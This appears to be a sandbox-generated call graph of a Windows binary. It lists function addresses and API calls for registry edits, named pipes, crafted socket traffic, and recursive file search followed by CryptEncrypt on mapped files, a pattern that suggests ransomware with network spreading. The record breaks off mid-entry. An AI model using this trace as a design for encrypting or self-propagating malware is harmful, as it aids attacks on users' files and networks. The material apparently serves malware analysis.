5267->5266 5269 4851364 5268->5269 5270 4851212 RegQueryValueExW 5268->5270 5269->5247 5269->5248 5272 485125c 5270->5272 5273 4851356 RegCloseKey 5272->5273 5274 485134f 5272->5274 5275 48512f0 memmove memcpy RegSetValueExW 5272->5275 5273->5269 5274->5273 5275->5273 5276 4851341 RegFlushKey 5275->5276 5276->5273 5278 4851435 RegQueryValueExW 5277->5278 5279 485152b 5277->5279 5280 4851461 5278->5280 5281 4851520 RegCloseKey 5278->5281 5279->5243 5280->5281 5282 485146a RegSetValueExW 5280->5282 5281->5279 5282->5281 5283 4851488 RegSetValueExW 5282->5283 5283->5281 5284 485149f RegSetValueExW 5283->5284 5284->5281 5285 48514b9 RegSetValueExW 5284->5285 5285->5281 5286 48514d1 RegSetValueExW 5285->5286 5286->5281 5287 48514ef RegSetValueExW 5286->5287 5287->5281 5288 4851507 5287->5288 5288->5281 5288->5288 5290 4856c5d 5289->5290 5293 4856bdd 5289->5293 5290->5005 5291 4856c53 GetProcessHeap HeapFree 5291->5290 5292 4856c49 GetProcessHeap HeapFree 5292->5291 5293->5291 5293->5292 5294 4856c2e GetProcessHeap HeapFree 5293->5294 5295 4856c1c GetProcessHeap HeapFree 5293->5295 5294->5293 5295->5294 5297 48564d4 CommandLineToArgvW 5296->5297 5298 48564c0 5296->5298 5299 4856528 5297->5299 5303 48564e8 5297->5303 5298->5297 5299->5016 5300 4856521 LocalFree 5300->5299 5301 4856520 5301->5300 5303->5300 5303->5301 5318 4856b95 5303->5318 5305 48569c7 5304->5305 5305->5305 5306 48569d2 GetProcessHeap HeapAlloc 5305->5306 5307 4856a9e 5306->5307 5308 48569f9 memcpy 5306->5308 5307->5016 5310 4856a27 5308->5310 5310->5310 5311 4856a32 GetProcessHeap HeapAlloc 5310->5311 5312 4856a94 GetProcessHeap HeapFree 5311->5312 5313 4856a4f memcpy 5311->5313 5312->5307 5315 4856e66 14 API calls 5313->5315 5316 4856a84 5315->5316 5316->5307 5317 4856a8b GetProcessHeap HeapFree 5316->5317 5317->5312 5319 4856b9f 5318->5319 5321 4856bc9 5318->5321 5320 4856e66 14 API calls 5319->5320 5319->5321 5320->5321 5321->5303 5322->5023 5323->5031 5325 4857153 GetCurrentProcess 5324->5325 5325->5039 5327 4856ff6 5326->5327 5328 4856fd2 WriteFile 5326->5328 5327->5052 5327->5053 5329 4856fef CloseHandle 5328->5329 5330 4856fe9 5328->5330 5329->5327 5330->5329 5331 4856fee 5330->5331 5331->5329 5333 485713d 5332->5333 5334 4857039 InitializeSecurityDescriptor 5332->5334 5334->5333 5335 485704a SetSecurityDescriptorDacl 5334->5335 5335->5333 5336 485705f CreateNamedPipeW 5335->5336 5336->5336 5337 485707d ConnectNamedPipe 5336->5337 5338 485708d 5337->5338 5339 485712f CloseHandle 5337->5339 5340 4857090 PeekNamedPipe 5338->5340 5341 48570bf GetProcessHeap HeapAlloc 5338->5341 5342 48570ae Sleep 5338->5342 5343 48570bd 5338->5343 5339->5336 5340->5338 5344 485711d FlushFileBuffers DisconnectNamedPipe 5341->5344 5345 48570d3 ReadFile 5341->5345 5342->5338 5343->5344 5344->5339 5346 4857112 GetProcessHeap HeapFree 5345->5346 5347 48570ec 5345->5347 5346->5344 5347->5346 5348 48570f4 StrChrW 5347->5348 5349 48569ae 24 API calls 5347->5349 5348->5346 5348->5347 5349->5346 5359 4856b0e 5350->5359 5352 485a396 GetProcessHeap HeapFree 5356 485a35c 5356->5352 5357 485a390 5356->5357 5362 4859f27 5356->5362 5368 4856b5f 5356->5368 5372 4856ad0 5356->5372 5375 4856b46 GetProcessHeap HeapFree 5357->5375 5376 4856ced GetProcessHeap HeapAlloc 5359->5376 5363 4859f34 5362->5363 5388 4856735 5363->5388 5365 4859f51 5366 4859f6d 5365->5366 5400 4859376 PathFindFileNameW 5365->5400 5366->5356 5369 4856b71 5368->5369 5369->5369 5921 4856e1b 5369->5921 5373 4856d35 3 API calls 5372->5373 5374 4856ae1 5373->5374 5374->5356 5375->5352 5377 4856b24 5376->5377 5378 4856d0b 5376->5378 5377->5356 5382 4856d35 5378->5382 5381 4856d20 GetProcessHeap HeapFree 5381->5377 5383 4856d1c 5382->5383 5384 4856d3e 5382->5384 5383->5377 5383->5381 5384->5383 5385 4856d43 EnterCriticalSection 5384->5385 5386 4856d7e LeaveCriticalSection 5384->5386 5387 4856d92 Sleep 5384->5387 5385->5384 5386->5383 5386->5384 5387->5385 5408 4856477 GetTickCount 5388->5408 5390 4856743 wsprintfW 5392 485676a 5390->5392 5392->5392 5393 4856775 EnterCriticalSection 5392->5393 5394 4856797 5393->5394 5395 4856792 5393->5395 5397 48567dd SetLastError 5394->5397 5398 48567bb StrCatW StrCatW 5394->5398 5409 4856628 5395->5409 5399 48567e5 LeaveCriticalSection 5397->5399 5398->5399 5399->5365 5401 485943a 5400->5401 5402 48593aa WideCharToMultiByte WideCharToMultiByte inet_addr 5400->5402 5401->5366 5403 4859403 WideCharToMultiByte 5402->5403 5404 48593f3 5402->5404 5425 4855337 GetProcessHeap HeapAlloc 5403->5425 5454 4859332 gethostbyname 5404->5454 5408->5390 5418 485686c 5409->5418 5411 4856722 5411->5394 5412 4856661 wsprintfW 5413 4856651 5412->5413 5413->5411 5413->5412 5414 48566ec StrCatW 5413->5414 5415 485671a 5413->5415 5421 4856893 5414->5421 5424 4856b46 GetProcessHeap HeapFree 5415->5424 5419 4856ced 7 API calls 5418->5419 5420 4856880 5419->5420 5420->5413 5422 4856d35 3 API calls 5421->5422 5423 48568a4 5422->5423 5423->5413 5424->5411 5426 4855365 rand 5425->5426 5427 48554fd 5425->5427 5428 4855391 5426->5428 5429 4855398 rand socket 5426->5429 5427->5401 5428->5429 5430 48553c5 htons inet_addr connect 5429->5430 5431 48554ed GetProcessHeap HeapFree 5429->5431 5432 4855406 5430->5432 5433 48554dc 5430->5433 5431->5427 5457 4851ca3 GetProcessHeap RtlAllocateHeap 5432->5457 5434 48554e6 closesocket 5433->5434 5434->5431 5437 485541c 5469 4852191 5437->5469 5453 48554bc 5578 4851dd1 GetProcessHeap HeapAlloc 5453->5578 5455 4859345 wsprintfA 5454->5455 5456 485936f 5454->5456 5455->5456 5456->5401 5456->5403 5458 4851dc7 5457->5458 5459 4851cd3 GetProcessHeap HeapAlloc 5457->5459 5458->5433 5458->5437 5460 4851db5 GetProcessHeap HeapFree 5459->5460 5461 4851ce6 htons send 5459->5461 5460->5458 5462 4851da5 GetProcessHeap HeapFree 5461->5462 5463 4851d30 recv 5461->5463 5462->5460 5463->5462 5464 4851d47 5463->5464 5464->5462 5587 4851c3a 5464->5587 5468 4851d62 5468->5462 5595 4851747 5468->5595 5470 4851eb9 11 API calls 5469->5470 5473 48521a8 5470->5473 5471 48521d0 5471->5453 5474 48546c7 GetProcessHeap HeapAlloc 5471->5474 5472 4852054 11 API calls 5472->5473 5473->5471 5473->5472 5475 4854aa4 5474->5475 5476 48546fa 5474->5476 5509 48521dc GetProcessHeap HeapAlloc 5475->5509 5662 4852497 GetProcessHeap HeapAlloc 5476->5662 5478 48547b1 GetProcessHeap HeapFree 5478->5475 5479 485471c 5479->5478 5480 4854745 5479->5480 5487 485475a 5479->5487 5680 4852e12 GetProcessHeap HeapAlloc 5480->5680 5483 4854754 5483->5478 5715 485317c GetProcessHeap HeapAlloc 5483->5715 5485 48521dc 19 API calls 5485->5487 5487->5483 5487->5485 5489 48547ae 5487->5489 5490 485478a Sleep 5487->5490 5690 48529a2 GetProcessHeap HeapAlloc 5487->5690 5488 48547e9 GetProcessHeap HeapAlloc 5488->5478 5491 4854802 5488->5491 5489->5478 5492 4852191 22 API calls 5490->5492 5493 485480c GetProcessHeap HeapAlloc 5491->5493 5505 485486a 5491->5505 5492->5487 5495 485481d 5493->5495 5493->5505 5494 48549a6 GetProcessHeap HeapAlloc 5494->5505 5723 4853209 GetProcessHeap HeapAlloc 5495->5723 5496 4854a91 GetProcessHeap HeapFree 5496->5478 5497 4854888 Sleep GetProcessHeap HeapAlloc 5497->5496 5497->5505 5501 4854872 GetProcessHeap HeapFree 5501->5505 5503 4854a42 5741 4853680 GetProcessHeap HeapAlloc 5503->5741 5505->5494 5505->5496 5505->5497 5505->5501 5505->5503 5728 48532af GetProcessHeap HeapAlloc 5505->5728 5736 48533a4 GetProcessHeap HeapAlloc 5505->5736 5507 4854a86 5507->5496 5510 485233b 5509->5510 5511 485220b GetProcessHeap HeapAlloc 5509->5511 5510->5453 5522 4851eb9 GetProcessHeap HeapAlloc 5510->5522 5512 4852222 htons send 5511->5512 5513 485232c GetProcessHeap HeapFree 5511->5513 5514 4852320 GetProcessHeap HeapFree 5512->5514 5515 4852263 recv 5512->5515 5513->5510 5514->5513 5515->5514 5516 485227f 5515->5516 5516->5514 5517 485228c memset GetProcessHeap HeapAlloc 5516->5517 5517->5514 5518 48522b3 htons send 5517->5518 5519 48522e4 recv 5518->5519 5520 4852311 GetProcessHeap HeapFree 5518->5520 5519->5520 5521 48522fc 5519->5521 5520->5514 5521->5520 5523 485204b 5522->5523 5524 4851ee8 GetProcessHeap HeapAlloc 5522->5524 5523->5453 5533 4852054 GetProcessHeap HeapAlloc 5523->5533 5526 4851f2e htons 5524->5526 5527 4852038 GetProcessHeap HeapFree 5524->5527 5528 4851f79 send 5526->5528 5527->5523 5530 4852028 GetProcessHeap HeapFree 5528->5530 5531 4851ffb recv 5528->5531 5530->5527 5531->5530 5532 4852012 5531->5532 5532->5530 5534 4852083 GetProcessHeap HeapAlloc 5533->5534 5535 4852188 5533->5535 5537 4852175 GetProcessHeap HeapFree 5534->5537 5538 48520ab htons 5534->5538 5535->5453 5544 4854ab5 5535->5544 5537->5535 5539 48520d6 5538->5539 5539->5539 5540 4852127 send 5539->5540 5541 4852165 GetProcessHeap HeapFree 5540->5541 5542 485213b recv 5540->5542 5541->5537 5542->5541 5543 4852152 5542->5543 5543->5541 5545 4852054 11 API calls 5544->5545 5550 4854ad3 5545->5550 5546 4854b45 5546->5453 5553 485516b 5546->5553 5547 4854b10 5549 4852f5a 12 API calls 5547->5549 5548 4852f5a 12 API calls 5548->5550 5551 4854b34 5549->5551 5550->5546 5550->5547 5550->5548 5551->5546 5552 48521dc 19 API calls 5551->5552 5552->5546 5554 4851eb9 11 API calls 5553->5554 5555 485518b 5554->5555 5556 485532d 5555->5556 5557 4852054 11 API calls 5555->5557 5556->5453 5558 48551ab 5557->5558 5558->5556 5870 4854e60 GetProcessHeap HeapAlloc 5558->5870 5561 48551c7 GetProcessHeap HeapAlloc 5561->5556 5562 48551e9 5561->5562 5879 4854f43 GetProcessHeap HeapAlloc 5562->5879 5565 4855201 GetProcessHeap HeapAlloc 5566 485531f GetProcessHeap HeapFree 5565->5566 5567 4855215 6 API calls 5565->5567 5566->5556 5568 4855311 GetProcessHeap HeapFree 5567->5568 5570 4855261 sprintf 5567->5570 5568->5566 5889 4854b5d 5570->5889 5573 4855305 GetProcessHeap HeapFree 5573->5568 5579 4851eb0 5578->5579 5580 4851dff GetProcessHeap HeapAlloc 5578->5580 5579->5434 5581 4851e13 htons send 5580->5581 5582 4851e9d GetProcessHeap HeapFree 5580->5582 5583 4851e54 recv 5581->5583 5584 4851e8d GetProcessHeap HeapFree 5581->5584 5582->5579 5583->5584 5585 4851e6d 5583->5585 5584->5582 5585->5584 5586 4851e73 memset 5585->5586 5586->5584 5588 485686c 7 API calls 5587->5588 5589 4851c5b 5588->5589 5590 4851c99 5589->5590 5591 4851747 54 API calls 5589->5591 5592 4851c93 5589->5592 5593 4856893 3 API calls 5589->5593 5590->5462 5590->5468 5591->5589 5640 4856b46 GetProcessHeap HeapFree 5592->5640 5593->5589 5596 485175a 5595->5596 5596->5596 5597 4851765 GetProcessHeap HeapAlloc 5596->5597 5598 4851c30 5597->5598 5599 485179b CharUpperW 5597->5599 5598->5468 5601 48517be 5599->5601 5601->5601 5602 48517c9 GetProcessHeap HeapAlloc 5601->5602 5603 4851c22 GetProcessHeap HeapFree 5602->5603 5604 48517ec htons 5602->5604 5603->5598 5605 485184e 5604->5605 5605->5605 5606 4851859 send 5605->5606 5607 4851c16 GetProcessHeap HeapFree 5606->5607 5608 4851871 recv 5606->5608 5607->5603 5608->5607 5609 4851890 5608->5609 5609->5607 5610 48518d4 5609->5610 5611 48518d9 GetProcessHeap HeapAlloc 5609->5611 5610->5607 5611->5607 5612 485190a 5611->5612 5641 48515a7 GetProcessHeap HeapAlloc 5612->5641 5615 4851c08 GetProcessHeap HeapFree 5615->5607 5616 48515a7 16 API calls 5617 4851946 5616->5617 5617->5615 5618 485194e GetProcessHeap HeapAlloc 5617->5618 5619 4851968 5618->5619 5620 4851bfa GetProcessHeap HeapFree 5618->5620 5621 4851983 rand 5619->5621 5620->5615 5621->5621 5622 4851996 5621->5622 5623 48515a7 16 API calls 5622->5623 5624 48519ac 5623->5624 5625 48519b4 GetProcessHeap HeapAlloc 5624->5625 5626 4851bec GetProcessHeap HeapFree 5624->5626 5627 4851bde GetProcessHeap HeapFree 5625->5627 5628 48519c8 GetProcessHeap HeapAlloc 5625->5628 5626->5620 5627->5626 5630 4851a26 htons 5628->5630 5631 4851bc3 GetProcessHeap HeapFree 5628->5631 5632 4851a76 memcpy 5630->5632 5631->5627 5634 4851b57 send 5632->5634 5636 4851b84 recv 5634->5636 5637 4851bb3 GetProcessHeap HeapFree 5634->5637 5636->5637 5638 4851b9d memset 5636->5638 5637->5631 5638->5637 5640->5590 5642 48515f1 CryptAcquireContextW 5641->5642 5643 485173d 5641->5643 5642->5643 5644 4851611 5642->5644 5643->5615 5643->5616 5645 4851621 5644->5645 5646 48516be CryptCreateHash 5644->5646 5647 485170b 5645->5647 5648 4851628 GetProcessHeap HeapAlloc 5645->5648 5646->5647 5650 48516d4 5646->5650 5651 4851717 CryptDestroyHash 5647->5651 5652 4851720 5647->5652 5648->5647 5649 4851642 CryptImportKey 5648->5649 5653 4851678 CryptCreateHash 5649->5653 5654 48516aa GetProcessHeap HeapFree 5649->5654 5650->5647 5655 48516de CryptHashData 5650->5655 5651->5652 5656 4851725 CryptDestroyKey 5652->5656 5657 485172e 5652->5657 5653->5654 5659 4851692 CryptSetHashParam 5653->5659 5654->5650 5655->5647 5660 48516f2 CryptGetHashParam 5655->5660 5656->5657 5657->5643 5658 4851733 CryptReleaseContext 5657->5658 5658->5643 5659->5654 5661 48516a6 5659->5661 5660->5647 5661->5654 5663 48524c5 GetProcessHeap HeapAlloc 5662->5663 5664 48526ff 5662->5664 5665 48526ec GetProcessHeap HeapFree 5663->5665 5666 48524dc rand htons 5663->5666 5664->5479 5665->5664 5667 485256f GetProcessHeap HeapAlloc 5666->5667 5668 485255f rand 5666->5668 5669 4852590 htons 5667->5669 5670 48526dc GetProcessHeap HeapFree 5667->5670 5668->5667 5668->5668 5671 48525cd rand 5669->5671 5670->5665 5671->5671 5672 48525dd GetProcessHeap HeapAlloc 5671->5672 5673 48526cc GetProcessHeap HeapFree 5672->5673 5674 48525fe memcpy memcpy send 5672->5674 5673->5670 5675 48526ba GetProcessHeap HeapFree 5674->5675 5676 485263a send 5674->5676 5675->5673 5676->5675 5678 4852653 5676->5678 5677 4852694 recv 5677->5678 5679 485269d 5677->5679 5678->5675 5678->5677 5678->5679 5679->5675 5681 4852f51 5680->5681 5682 4852e48 GetProcessHeap HeapAlloc 5680->5682 5681->5483 5683 4852e5c htons 5682->5683 5684 4852f3e GetProcessHeap HeapFree 5682->5684 5687 4852ed3 5683->5687 5684->5681 5685 4852ee7 send 5686 4852efd recv 5685->5686 5685->5687 5686->5687 5687->5685 5688 4852f2e GetProcessHeap HeapFree 5687->5688 5689 4852f2a 5687->5689 5688->5684 5689->5688 5691 48529d5 GetProcessHeap HeapAlloc 5690->5691 5692 4852e08 5690->5692 5693 4852df6 GetProcessHeap HeapFree 5691->5693 5694 48529eb rand htons 5691->5694 5692->5487 5693->5692 5695 4852a7e rand 5694->5695 5695->5695 5696 4852a8d 5695->5696 5697 4852a91 rand send 5696->5697 5699 4852ae5 rand htons GetProcessHeap HeapAlloc 5696->5699 5697->5696 5698 4852ac5 recv 5697->5698 5698->5696 5698->5699 5700 4852de6 GetProcessHeap HeapFree 5699->5700 5701 4852b82 htons 5699->5701 5700->5693 5702 4852bbe rand 5701->5702 5702->5702 5703 4852bce GetProcessHeap HeapAlloc 5702->5703 5704 4852dd6 GetProcessHeap HeapFree 5703->5704 5705 4852bec htons GetProcessHeap HeapAlloc 5703->5705 5704->5700 5706 4852dc3 GetProcessHeap HeapFree 5705->5706 5707 4852c72 memcpy memcpy htons 5705->5707 5706->5704 5708 4852d0c memcpy 5707->5708 5708->5708 5709 4852d25 send 5708->5709 5710 4852d3d send 5709->5710 5711 4852dae GetProcessHeap HeapFree 5709->5711 5710->5711 5714 4852d55 5710->5714 5711->5706 5712 4852d83 recv 5713 4852d8c 5712->5713 5712->5714 5713->5711 5714->5711 5714->5712 5714->5713 5716 4853201 5715->5716 5717 48531a2 rand 5715->5717 5716->5478 5716->5488 5718 48531bd rand 5717->5718 5718->5718 5719 48531ca 5718->5719 5820 4852f5a GetProcessHeap HeapAlloc 5719->5820 5724 48532a7 5723->5724 5725 4853233 htons memcpy send 5723->5725 5724->5505 5726 4853297 GetProcessHeap HeapFree 5725->5726 5727 4853293 5725->5727 5726->5724 5727->5726 5729 48532e1 GetProcessHeap HeapAlloc 5728->5729 5730 485339b GetProcessHeap HeapFree 5728->5730 5731 48532fe htons memcpy send 5729->5731 5732 4853388 GetProcessHeap HeapFree 5729->5732 5730->5503 5730->5505 5733 4853378 GetProcessHeap HeapFree 5731->5733 5734 485335a recv 5731->5734 5732->5730 5733->5732 5734->5733 5735 4853372 5734->5735 5735->5733 5737 4853441 5736->5737 5738 48533ce htons memcpy send 5736->5738 5737->5505 5739 4853431 GetProcessHeap HeapFree 5738->5739 5740 485342d 5738->5740 5739->5737 5740->5739 5742 4853d03 5741->5742 5743 48536ad GetProcessHeap HeapAlloc 5741->5743 5742->5507 5792 48541e9 GetProcessHeap HeapAlloc 5742->5792 5744 4853cf7 GetProcessHeap HeapFree 5743->5744 5745 48536c0 GetProcessHeap HeapAlloc 5743->5745 5744->5742 5746 4853ce1 GetProcessHeap HeapFree 5745->5746 5747 48536dc 5745->5747 5746->5744 5748 4853b39 5747->5748 5749 48536e8 5747->5749 5753 4853209 7 API calls 5748->5753 5750 48533a4 7 API calls 5749->5750 5751 4853745 5750->5751 5752 4853cd1 GetProcessHeap HeapFree 5751->5752 5754 4853787 5751->5754 5757 48533a4 7 API calls 5751->5757 5752->5746 5755 4853baa 5753->5755 5754->5752 5756 485379d Sleep 5754->5756 5755->5752 5758 4853bb2 Sleep 5755->5758 5760 4853209 7 API calls 5756->5760 5757->5754 5759 4853bca 5758->5759 5762 4853209 7 API calls 5759->5762 5761 4853806 5760->5761 5761->5752 5764 4853876 5761->5764 5766 4853209 7 API calls 5761->5766 5763 4853c5b 5762->5763 5763->5752 5765 4853c5f Sleep rand 5763->5765 5764->5752 5767 4853888 Sleep 5764->5767 5768 4853209 7 API calls 5765->5768 5769 4853841 5766->5769 5770 48533a4 7 API calls 5767->5770 5772 4853cbe 5768->5772 5769->5764 5774 48533a4 7 API calls 5769->5774 5771 48538d2 5770->5771 5771->5752 5775 48533a4 7 API calls 5771->5775 5772->5752 5773 4853cc2 Sleep 5772->5773 5773->5752 5774->5764 5776 485392c 5775->5776 5776->5752 5777 4853934 GetProcessHeap HeapAlloc 5776->5777 5777->5752 5778 4853953 memset 5777->5778 5779 4853209 7 API calls 5778->5779 5780 4853978 5779->5780 5781 4853980 recv 5780->5781 5782 4853b22 GetProcessHeap HeapFree 5780->5782 5781->5782 5783 485399b 5781->5783 5782->5752 5783->5782 5784 48539a8 htons 5783->5784 5784->5782 5785 48539c1 5784->5785 5785->5782 5786 4853209 7 API calls 5785->5786 5787 4853a88 5786->5787 5787->5782 5788 4853a90 Sleep rand 5787->5788 5789 48533a4 7 API calls 5788->5789 5790 4853b0f 5789->5790 5790->5782 5791 4853b13 Sleep 5790->5791 5791->5782 5793 4854217 5792->5793 5794 4854679 5792->5794 5828 48540e3 GetProcessHeap HeapAlloc 5793->5828 5794->5507 5797 4854669 GetProcessHeap HeapFree 5797->5794 5800 4854271 GetProcessHeap HeapFree 5801 48542a0 5800->5801 5802 4854683 5800->5802 5803 48542e8 5801->5803 5805 4853d0d 45 API calls 5801->5805 5804 48540e3 17 API calls 5802->5804 5803->5797 5807 4853d0d 45 API calls 5803->5807 5819 485465e 5804->5819 5806 48542c7 5805->5806 5806->5803 5808 48542cb GetProcessHeap HeapFree 5806->5808 5809 485431d 5807->5809 5808->5803 5809->5797 5810 4854325 GetProcessHeap HeapFree 5809->5810 5811 4854351 5810->5811 5812 4853d0d 45 API calls 5811->5812 5813 485436e 5812->5813 5813->5797 5814 4854376 GetProcessHeap HeapFree memset 5813->5814 5814->5797 5815 48543c1 5814->5815 5816 48540e3 17 API calls 5815->5816 5817 4854641 5816->5817 5818 48540e3 17 API calls 5817->5818 5817->5819 5818->5819 5819->5797 5821 4852f89 GetProcessHeap HeapAlloc 5820->5821 5822 4853068 GetProcessHeap HeapFree 5820->5822 5823 4853055 GetProcessHeap HeapFree 5821->5823 5824 4852fa6 htons memcpy send 5821->5824 5822->5716 5823->5822 5825 4853045 GetProcessHeap HeapFree 5824->5825 5826 4853025 recv 5824->5826 5825->5823 5826->5825 5827 485303c 5826->5827 5827->5825 5829 48541e0 5828->5829 5830 485410b GetProcessHeap HeapAlloc 5828->5830 5829->5797 5841 4853d0d GetProcessHeap HeapAlloc 5829->5841 5832 48541d4 GetProcessHeap HeapFree 5830->5832 5833 4854158 5830->5833 5832->5829 5834 4853209 7 API calls 5833->5834 5835 485417b 5834->5835 5836 48541c6 GetProcessHeap HeapFree 5835->5836 5837 485417f Sleep 5835->5837 5836->5832 5838 4853209 7 API calls 5837->5838 5839 48541b3 5838->5839 5839->5836 5840 48541b7 Sleep 5839->5840 5840->5836 5842 4853d41 GetProcessHeap HeapAlloc 5841->5842 5843 48540da 5841->5843 5844 4853d55 GetProcessHeap HeapAlloc 5842->5844 5845 48540cb GetProcessHeap HeapFree 5842->5845 5843->5797 5843->5800 5846 4853d72 5844->5846 5847 48540bf GetProcessHeap HeapFree 5844->5847 5845->5843 5848 4853209 7 API calls 5846->5848 5847->5845 5849 4853e4e 5848->5849 5850 4853e56 Sleep GetProcessHeap HeapAlloc 5849->5850 5851 48540b3 GetProcessHeap HeapFree 5849->5851 5850->5851 5852 4853e79 rand 5850->5852 5851->5847 5853 48532af 12 API calls 5852->5853 5854 4853ef0 5853->5854 5855 4853ef8 memset 5854->5855 5856 485409b GetProcessHeap HeapFree 5854->5856 5857 4853209 7 API calls 5855->5857 5856->5851 5858 4853f22 5857->5858 5858->5856 5859 4853f2a recv 5858->5859 5859->5856 5860 4853f46 5859->5860 5860->5856 5861 4853f50 htons 5860->5861 5861->5856 5862 4853f73 5861->5862 5863 4853209 7 API calls 5862->5863 5864 4853feb 5863->5864 5864->5856 5865 4853ff3 Sleep 5864->5865 5866 4853209 7 API calls 5865->5866 5867 485405a 5866->5867 5867->5856 5868 485405e Sleep GetProcessHeap HeapAlloc 5867->5868 5868->5856 5869 4854084 memcpy 5868->5869 5869->5856 5871 4854f38 5870->5871 5872 4854e89 5870->5872 5871->5556 5871->5561 5872->5872 5873 4852f5a 12 API calls 5872->5873 5874 4854ee8 5873->5874 5875 4854f2f GetProcessHeap HeapFree 5874->5875 5911 4853071 GetProcessHeap HeapAlloc 5874->5911 5875->5871 5878 4854f27 GetProcessHeap HeapFree 5878->5875 5880 4855014 5879->5880 5881 4854f6f rand 5879->5881 5880->5565 5880->5566 5883 4852f5a 12 API calls 5881->5883 5884 4854fad 5883->5884 5885 4855004 GetProcessHeap HeapFree 5884->5885 5886 4853071 14 API calls 5884->5886 5885->5880 5888 4854fcb 5886->5888 5887 4854ff4 GetProcessHeap HeapFree 5887->5885 5888->5885 5888->5887 5890 4854b77 GetProcessHeap HeapAlloc 5889->5890 5892 4854c2e rand 5890->5892 5894 4854cff 5890->5894 5892->5894 5894->5573 5895 485501e 5894->5895 5896 4852f5a 12 API calls 5895->5896 5897 4855040 5896->5897 5898 485509b 5897->5898 5899 4853071 14 API calls 5897->5899 5898->5573 5902 48550a2 GetProcessHeap HeapAlloc 5898->5902 5901 4855060 5899->5901 5900 485508b GetProcessHeap HeapFree 5900->5898 5901->5898 5901->5900 5903 4855162 5902->5903 5904 48550ca 5902->5904 5903->5573 5905 4852f5a 12 API calls 5904->5905 5906 4855117 5905->5906 5907 4855155 GetProcessHeap HeapFree 5906->5907 5908 4853071 14 API calls 5906->5908 5907->5903 5909 485513f 5908->5909 5909->5907 5910 4855143 GetProcessHeap HeapFree 5909->5910 5910->5907 5912 4853173 5911->5912 5913 485309f GetProcessHeap HeapAlloc 5911->5913 5912->5875 5912->5878 5914 4853160 GetProcessHeap HeapFree 5913->5914 5915 48530b3 htons send 5913->5915 5914->5912 5916 4853101 recv 5915->5916 5917 4853150 GetProcessHeap HeapFree 5915->5917 5916->5917 5918 485311c 5916->5918 5917->5914 5918->5917 5919 4853124 GetProcessHeap HeapAlloc 5918->5919 5919->5917 5920 485313f memcpy 5919->5920 5920->5917 5922 4856b90 5921->5922 5923 4856e29 EnterCriticalSection 5921->5923 5922->5356 5924 4856e39 5923->5924 5928 4856da4 5924->5928 5929 4856e13 LeaveCriticalSection 5928->5929 5930 4856db3 EnterCriticalSection 5928->5930 5929->5922 5931 4856e0b LeaveCriticalSection 5930->5931 5932 4856dc6 5930->5932 5931->5929 5933 4856df1 5932->5933 5935 4856aa8 5932->5935 5933->5931 5936 4856ab1 5935->5936 5937 4856aca 5935->5937 5936->5937 5938 4856ab7 StrCmpIW 5936->5938 5937->5932 5938->5937 5940 48562b9 5939->5940 5942 485634f 5939->5942 5960 4855507 CryptAcquireContextW 5940->5960 5942->5942 5944 485635c LocalFree 5942->5944 5945 4856345 CloseHandle 5945->5942 5948 485633c CryptReleaseContext 5948->5945 5951 4856333 CryptDestroyKey 5951->5948 5954 48562ed CreateThread 5984 4855e9f 5954->5984 6061 48560f9 5954->6061 5955 485632a CryptDestroyKey 5955->5951 5958 485631f CryptDestroyHash 5958->5955 5959 485630f WaitForSingleObject CloseHandle 5959->5958 5961 4855542 5960->5961 5962 4855528 GetLastError 5960->5962 5961->5945 5964 4855613 CryptStringToBinaryW 5961->5964 5962->5961 5963 4855535 CryptAcquireContextW 5962->5963 5963->5961 5965 4855640 LocalAlloc 5964->5965 5967 48556ce 5964->5967 5966 4855655 CryptStringToBinaryW 5965->5966 5965->5967 5968 48556c5 LocalFree 5966->5968 5969 4855668 CryptDecodeObjectEx 5966->5969 5967->5948 5974 4856085 CryptCreateHash 5967->5974 5968->5967 5969->5968 5970 4855688 LocalAlloc 5969->5970 5970->5968 5971 4855695 CryptDecodeObjectEx 5970->5971 5972 48556ac CryptImportPublicKeyInfo 5971->5972 5973 48556be LocalFree 5971->5973 5972->5973 5973->5968 5975 48560f1 5974->5975 5976 48560b0 CryptHashData 5974->5976 5975->5951 5980 4856246 CryptCreateHash 5975->5980 5976->5975 5977 48560c4 CryptDeriveKey CryptDestroyHash 5976->5977 5977->5975 5978 48560ea 5977->5978 5998 485559b CryptSetKeyParam CryptSetKeyParam CryptGetKeyParam 5978->5998 5981 4856292 5980->5981 5982 485626a CryptHashData 5980->5982 5981->5954 5981->5955 5982->5981 5983 485627d CryptGetHashParam 5982->5983 5983->5981 5985 485607d 5984->5985 5986 4855eb8 PathCombineW 5984->5986 5985->5958 5985->5959 5986->5985 5987 4855ed6 FindFirstFileW 5986->5987 5987->5985 5988 4855ef6 WaitForMultipleObjects 5987->5988 5989 4856073 FindClose 5988->5989 5996 4855f17 5988->5996 5989->5985 5990 485605c FindNextFileW 5990->5988 5990->5989 5991 4855fa1 PathCombineW 5991->5990 5991->5996 5992 4856016 PathFindExtensionW 5992->5996 5993 4855e9f 36 API calls 5993->5996 5994 4855fdf StrStrIW 5994->5990 5994->5996 5996->5989 5996->5990 5996->5991 5996->5992 5996->5993 5996->5994 6003 4855d0a CryptDuplicateKey 5996->6003 6026 48559b1 5996->6026 5999 48555e4 5998->5999 6000 485560c 5998->6000 5999->6000 6001 48555e9 LocalAlloc 5999->6001 6000->5975 6001->6000 6002 48555fb CryptSetKeyParam LocalFree 6001->6002 6002->6000 6004 4855e98 6003->6004 6005 4855d38 CreateFileW 6003->6005 6004->5990 6006 4855e7c CryptDestroyKey 6005->6006 6007 4855d58 GetFileSizeEx 6005->6007 6006->6004 6008 4855e8a 6006->6008 6009 4855da2 CreateFileMappingW 6007->6009 6014 4855d78 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6007->6014 6008->6004 6012 4855e8f SetEvent 6008->6012 6010 4855dcd 6009->6010 6011 4855e6e CloseHandle 6009->6011 6030 4855a73 GetSystemInfo 6010->6030 6011->6006 6012->6004 6014->6009 6016 4855e4c 6018 4855e51 CloseHandle 6016->6018 6017 4855df3 MapViewOfFile 6017->6016 6019 4855e0a CryptEncrypt 6017->6019 6018->6011 6020 4855e5e 6018->6020 6022 4855e26 FlushViewOfFile 6019->6022 6023 4855e32 UnmapViewOfFile 6019->6023 6056 4855a11 GetFileSizeEx 6020->6056 6022->6023 6023->6018 6024 4855e3f 6023->6024 6044 4855bc4 GetSystemInfo 6024->6044 6027 48559c5 6026->6027 6027->6027 6028 48559eb StrStrIW 6027->6028 6029 4855a09 6028->6029 6029->5996 6031 4855ac8 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 6030->6031 6032 4855adb MapViewOfFile 6031->6032 6033 4855afb 6032->6033 6034 4855bba 6032->6034 6035 